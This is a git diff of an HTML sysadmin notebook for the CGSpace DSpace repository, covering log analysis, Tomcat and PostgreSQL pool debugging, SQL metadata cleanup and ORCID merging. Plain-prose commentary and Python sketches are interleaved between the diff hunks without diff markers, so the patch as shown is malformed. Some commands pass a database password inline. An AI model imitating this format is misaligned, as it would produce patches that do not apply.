    2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: "GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1", upstream: "http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12", host: "cgspace.cgiar.org"
     
    -
    # awk '($9 ~ /200/) { i++;sum+=$10;max=$10>max?$10:max; } END { printf("Maximum: %d\nAverage: %d\n",max,i?sum/i:0); }' /var/log/nginx/access.log
    +
    # awk '($9 ~ /200/) { i++;sum+=$10;max=$10>max?$10:max; } END { printf("Maximum: %d\nAverage: %d\n",max,i?sum/i:0); }' /var/log/nginx/access.log
     Maximum: 2771268
     Average: 210483
     
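For reference, a Python sketch of what the awk one-liner above computes, assuming whitespace-separated log lines where the status code is field 9 and the body size is field 10. One deliberate difference: awk's `$9 ~ /200/` is a regex match, while this sketch compares the status for exact equality. The sample lines are made up:

```python
def response_size_stats(lines):
    """Return (maximum, average) body size in bytes for HTTP 200 responses."""
    sizes = []
    for line in lines:
        fields = line.split()
        # awk's $9 and $10 are fields[8] and fields[9] with zero-based indexing
        if len(fields) < 10 or fields[8] != "200":
            continue
        if fields[9].isdigit():
            sizes.append(int(fields[9]))
    if not sizes:
        return 0, 0
    # Integer division truncates the average, like awk's %d formatting
    return max(sizes), sum(sizes) // len(sizes)


# Made-up sample lines, only to show the field positions
sample_lines = [
    '192.0.2.1 - - [29/Jan/2018:05:26:34 +0000] "GET /a HTTP/1.1" 200 1000 "-" "ua"',
    '192.0.2.2 - - [29/Jan/2018:05:26:35 +0000] "GET /b HTTP/1.1" 200 3001 "-" "ua"',
    '192.0.2.3 - - [29/Jan/2018:05:26:36 +0000] "GET /c HTTP/1.1" 404 500 "-" "ua"',
]
print(response_size_stats(sample_lines))
```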
      @@ -1297,7 +1297,7 @@ Average: 210483
    • My best guess is that the Solr search error is related somehow but I can’t figure it out
    • We definitely have enough database connections, as I haven’t seen a pool error in weeks:
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-2*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-2*
     dspace.log.2018-01-20:0
     dspace.log.2018-01-21:0
     dspace.log.2018-01-22:0
    @@ -1329,7 +1329,7 @@ dspace.log.2018-01-29:0
     
    [tomcat_*]
         env.host 127.0.0.1
         env.port 8081
    -    env.connector "http-bio-127.0.0.1-8443"
    +    env.connector "http-bio-127.0.0.1-8443"
         env.user munin
         env.password munin
     
      @@ -1345,8 +1345,8 @@ max.value 400
    • Although following the logic of /usr/share/munin/plugins/jmx_tomcat_dbpools could be useful for getting the active Tomcat sessions
    • From debugging the jmx_tomcat_db_pools script from the munin-plugins-java package, I see that this is how you call arbitrary mbeans:
    -
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
    -Catalina:type=DataSource,class=javax.sql.DataSource,name="jdbc/dspace"  maxActive       300
    +
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
    +Catalina:type=DataSource,class=javax.sql.DataSource,name="jdbc/dspace"  maxActive       300
     
    • There are millions of these status lines, for example in just this one log file:
    -
    # zgrep -c "time remaining" /var/log/tomcat7/catalina.out.1.gz
    +
    # zgrep -c "time remaining" /var/log/tomcat7/catalina.out.1.gz
     1084741
     
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          67 66.249.66.70
          70 207.46.13.12
          71 197.210.168.174
    @@ -1400,7 +1400,7 @@ javax.ws.rs.WebApplicationException
         198 66.249.66.90
         219 41.204.190.40
         255 2405:204:a208:1e12:132:2a8e:ad28:46c0
    -# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           2 65.55.210.187
           2 66.249.66.90
           3 157.55.39.79
    @@ -1426,7 +1426,7 @@ javax.ws.rs.WebApplicationException
     
  • I should make separate database pools for the web applications and the API applications like REST and OAI
  • Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat’s activeSessions from JMX (using munin-plugins-java):
  • -
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
    +
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
     Catalina:type=Manager,context=/,host=localhost  activeSessions  8
     
    • If you connect to Tomcat in jvisualvm it’s pretty obvious when you hover over the elements
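A small sketch for turning the Beans output shown above into values a monitoring script could use. It assumes each output line is whitespace-separated as "bean path, attribute, numeric value", which matches the two examples in this log but is not something I have checked against the plugin's source. The function name is hypothetical:

```python
def parse_bean_line(line: str):
    """Split one line of Beans output into (bean, attribute, value)."""
    parts = line.split()
    if len(parts) < 3:
        raise ValueError(f"unexpected Beans output: {line!r}")
    # The last two tokens are the attribute name and its value;
    # everything before them is treated as the MBean path.
    bean = " ".join(parts[:-2])
    return bean, parts[-2], int(parts[-1])


print(parse_bean_line("Catalina:type=Manager,context=/,host=localhost  activeSessions  8"))
```

Keeping the bean path in the result makes it possible to query several contexts in one run and tell the values apart.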
    • diff --git a/docs/2018-02/index.html b/docs/2018-02/index.html index 9573511ef..a6b590302 100644 --- a/docs/2018-02/index.html +++ b/docs/2018-02/index.html @@ -30,7 +30,7 @@ We don’t need to distinguish between internal and external works, so that Yesterday I figured out how to monitor DSpace sessions using JMX I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu’s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01 "/> - + @@ -139,8 +139,8 @@ v_oai.value 0
    • I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January
    • After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:
    -
    $ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
    -$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
    +
    $ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
    +$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
     
    • Then I started a full Discovery reindex:
    @@ -152,12 +152,12 @@ sys 2m29.088s
    • Generate a new list of affiliations for Peter to sort through:
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
     COPY 3723
     
    • Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in December:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2018"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2018"
     3126109
     
     real    0m23.839s
    @@ -167,14 +167,14 @@ sys     0m1.905s
     
    • Toying with correcting authors with trailing spaces via PostgreSQL:
    -
    dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
    +
    dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
     UPDATE 20
     
    • I tried the TRIM(TRAILING from text_value) function and it said it changed 20 items but the spaces didn’t go away
    • This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.
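One possible explanation, offered only as a guess, is that the trailing characters were not plain spaces: a bare `TRIM(TRAILING FROM ...)` strips only the space character by default, while `\s+$` matches any trailing whitespace. A minimal Python sketch of that difference follows. The function names and the sample value are hypothetical, and Python's `\s` is not guaranteed to match exactly the same characters as PostgreSQL's.

```python
import re


def strip_trailing_spaces(value):
    # Removes only trailing U+0020 characters, similar in spirit to a
    # bare TRIM(TRAILING FROM value).
    return value.rstrip(" ")


def strip_trailing_whitespace(value):
    # Removes any run of trailing whitespace (tabs, newlines, ...),
    # similar in spirit to REGEXP_REPLACE(value, '\s+$', '').
    return re.sub(r"\s+$", "", value)


# Hypothetical author value that ends in a tab rather than a space.
sample = "Duncan, Alan\t"
print(repr(strip_trailing_spaces(sample)))
print(repr(strip_trailing_whitespace(sample)))
```

If the two functions disagree on a real value, the trailing character is something other than a plain space.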
    • Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
     COPY 55630
     

    2018-02-06

      @@ -184,7 +184,7 @@ COPY 55630
    # date
     Tue Feb  6 09:30:32 UTC 2018
    -# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           2 223.185.41.40
           2 66.249.64.14
           2 77.246.52.40
    @@ -195,7 +195,7 @@ Tue Feb  6 09:30:32 UTC 2018
           6 154.68.16.34
           7 207.46.13.66
        1548 50.116.102.77
    -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          77 213.55.99.121
          86 66.249.64.14
         101 104.196.152.243
    @@ -232,8 +232,8 @@ Tue Feb  6 09:30:32 UTC 2018
     
  • CGSpace crashed again, this time around Wed Feb 7 11:20:28 UTC 2018
  • I took a few snapshots of the PostgreSQL activity at the time and over the following minutes; the connections were very high at first but dropped on their own:
  • -
    $ psql -c 'select * from pg_stat_activity' > /tmp/pg_stat_activity.txt
    -$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
    +
    $ psql -c 'select * from pg_stat_activity' > /tmp/pg_stat_activity.txt
    +$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
     /tmp/pg_stat_activity1.txt:300
     /tmp/pg_stat_activity2.txt:272
     /tmp/pg_stat_activity3.txt:168
    @@ -242,7 +242,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
     
    • Interestingly, all of those 751 connections were idle!
    -
    $ grep "PostgreSQL JDBC" /tmp/pg_stat_activity* | grep -c idle
    +
    $ grep "PostgreSQL JDBC" /tmp/pg_stat_activity* | grep -c idle
     751
     
    • Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps
    • @@ -252,7 +252,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
      • Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:
      -
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       1828
       
      • CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)
      • @@ -262,11 +262,11 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
      • … but in PostgreSQL I see them idle or idle in transaction:
      -
      $ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
      +
      $ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
       250
      -$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
      +$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
       250
      -$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
      +$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
       187
       
      • What the fuck, does DSpace think all connections are busy?
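Note that `grep -c idle` also counts lines containing `idle in transaction`, so the two numbers above overlap. A rough Python sketch of tallying each state separately is below. It assumes the input comes from something like `psql -At -F '|' -c 'select application_name, state from pg_stat_activity'` and that the pool names (`dspaceWeb`, `dspaceApi`) appear in `application_name`; the function name and sample rows are made up for illustration.

```python
from collections import Counter


def count_pool_states(lines):
    """Tally (pool, state) pairs from 'application_name|state' lines."""
    counts = Counter()
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue  # skip blank lines
        # Split on the first separator only; the state may contain spaces.
        pool, _, state = line.partition("|")
        counts[(pool, state)] += 1
    return counts


# Hypothetical rows, not real output from the server.
sample = [
    "dspaceWeb|idle",
    "dspaceWeb|idle in transaction",
    "dspaceWeb|idle in transaction",
    "dspaceApi|idle",
]
for (pool, state), n in sorted(count_pool_states(sample).items()):
    print(f"{n:7d} {pool} {state}")
```

Because the counter groups identical keys regardless of order, it also avoids the repeated rows that `uniq -c` produces on unsorted input.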
      • @@ -275,12 +275,12 @@ $ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle
      • Also, WTF, there was a heap space error randomly in catalina.out:
      Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
      -Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfMemoryError: Java heap space
      +Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfMemoryError: Java heap space
       
      • I’m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!
      • Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:
      -
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
      +
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
            34 ip_addr=46.229.168.67
            34 ip_addr=46.229.168.73
            37 ip_addr=46.229.168.76
      @@ -304,27 +304,26 @@ Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfM
       
      • These IPs made thousands of sessions today:
      -
      $ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +
      $ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       530
      -$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       859
      -$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       610
      -$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       8
      -$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       826
      -$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       727
      -$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       181
      -$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       24
      -$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       166
      -$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       992
      -
       
      • Let’s investigate who these IPs belong to:
          @@ -355,13 +354,13 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
        • Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker
        • This is how the connections looked when it crashed this afternoon:
        -
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
        +
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
               5 dspaceApi
             290 dspaceWeb
         
        • This is how it is right now:
        -
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
        +
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
               5 dspaceApi
               5 dspaceWeb
         
          @@ -378,7 +377,7 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
        • Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn’t show up on the item
        • Leave all settings but change choices.presentation to lookup: the ORCID badge is there and item submission uses LC Name Authority, but it breaks with this error:
        -
        Field dc_contributor_author has choice presentation of type "select", it may NOT be authority-controlled.
        +
        Field dc_contributor_author has choice presentation of type "select", it may NOT be authority-controlled.
         
        • If I change choices.presentation to suggest it gives this error:
        @@ -409,18 +408,18 @@ authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between
      • I updated my fix-metadata-values.py and delete-metadata-values.py scripts on the scripts page: https://github.com/ilri/DSpace/wiki/Scripts
      • I ran the 342 author corrections (after trimming whitespace and excluding those with || and other syntax errors) on CGSpace:
      -
      $ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
       
      • Then I ran a full Discovery re-indexing:
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
       $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
       
      -
      dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
      +
      dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
          text_value    |              authority               | confidence 
       -----------------+--------------------------------------+------------
        Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 |        600
      @@ -434,9 +433,9 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
       (8 rows)
       
       dspace=# begin;
      -dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
      +dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
       UPDATE 216
      -dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
      +dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
         text_value  |              authority               | confidence 
       --------------+--------------------------------------+------------
        Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
      @@ -464,7 +463,7 @@ dspace=# commit;
       
    • I see that in April, 2017 I just used a SQL query to get a user’s submissions by checking the dc.description.provenance field
    • So for Abenet, I can check her submissions in December, 2017 with:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
     
    • I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it
    • This would be using Linode’s new block storage volumes
    • @@ -484,7 +483,7 @@ Caused by: java.net.SocketException: Socket closed
    • Could be because of the removeAbandoned="true" that I enabled in the JDBC connection pool last week?
    -
    $ grep -c "java.net.SocketException: Socket closed" dspace.log.2018-02-*
    +
    $ grep -c "java.net.SocketException: Socket closed" dspace.log.2018-02-*
     dspace.log.2018-02-01:0
     dspace.log.2018-02-02:0
     dspace.log.2018-02-03:0
    @@ -535,27 +534,27 @@ $ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
     
  • Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+
  • Peter combined it with mine and we have 1204 unique ORCIDs!
  • -
    $ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
    +
    $ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
     1204
    -$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
    +$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
     1204
     
    • Also, save that regex for the future because it will be very useful!
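The regex only checks the shape of an identifier. ORCID iDs also end in a check character (ISO 7064 MOD 11-2, a digit or `X`), so a stricter test can catch typos that still look right. A minimal Python sketch, with a hypothetical function name and a slightly tighter pattern than the one used in the commands above:

```python
import re

# Three groups of four digits, then three digits and a check character.
ORCID_SHAPE = re.compile(r"[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{3}[0-9X]")


def is_valid_orcid(identifier):
    """Check the shape and the MOD 11-2 check character of an ORCID iD."""
    if ORCID_SHAPE.fullmatch(identifier) is None:
        return False
    digits = identifier.replace("-", "")
    total = 0
    for char in digits[:15]:
        total = (total + int(char)) * 2
    expected = (12 - total % 11) % 11
    check = "X" if expected == 10 else str(expected)
    return digits[15] == check


for candidate in ("0000-0001-5019-1368", "0000-0001-9634-19580"):
    print(candidate, is_valid_orcid(candidate))
```

A passing check only means the identifier is well formed, not that a profile exists for it.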
    • -
    • CIAT sent a list of their authors' ORCIDs and combined with ours there are now 1227:
    • +
    • CIAT sent a list of their authors’ ORCIDs and combined with ours there are now 1227:
    -
    $ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
    +
    $ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
     1227
     
    • There are some formatting issues with names in Peter’s list, so I should remember to re-generate the list of names from ORCID’s API once we’re done
    • The dspace cleanup -v currently fails on CGSpace with the following:
     - Deleting bitstream record from database (ID: 149473)
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(149473) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(149473) is still referenced from table "bundle".
     
    • The solution is to update the bundle table, as I’ve discovered several other times in 2016 and 2017:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
     UPDATE 1
     
    • Then the cleanup process will continue for a while and hit another foreign key conflict, and eventually it will complete after you manually resolve them all
    • @@ -575,25 +574,25 @@ UPDATE 1
    • I only looked quickly in the logs but saw a bunch of database errors
    • PostgreSQL connections are currently:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
           2 dspaceApi
           1 dspaceWeb
           3 dspaceApi
     
    • I see shitloads of memory errors in Tomcat’s logs:
    -
    # grep -c "Java heap space" /var/log/tomcat7/catalina.out
    +
    # grep -c "Java heap space" /var/log/tomcat7/catalina.out
     56
     
    • And shit tons of database connections abandoned:
    -
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
    +
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
     612
     
    • I have no fucking idea why it crashed
    • The XMLUI activity looks like:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "15/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "15/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         715 63.143.42.244
         746 213.55.99.121
         886 68.180.228.157
    @@ -610,7 +609,7 @@ UPDATE 1
     
